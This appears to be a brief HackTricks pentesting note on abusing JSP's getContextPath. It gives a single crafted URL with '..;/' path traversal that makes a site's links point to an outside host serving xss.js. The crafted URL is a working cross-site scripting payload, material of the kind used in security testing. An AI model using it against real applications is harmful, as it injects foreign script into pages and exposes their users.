hacktricks/pentesting/pentesting-web/jsp.md

395 B

JSP

getContextPath abuse

Info from here.

 http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp

Accessing that web you may change all the links to request the information to rakeshmane.com: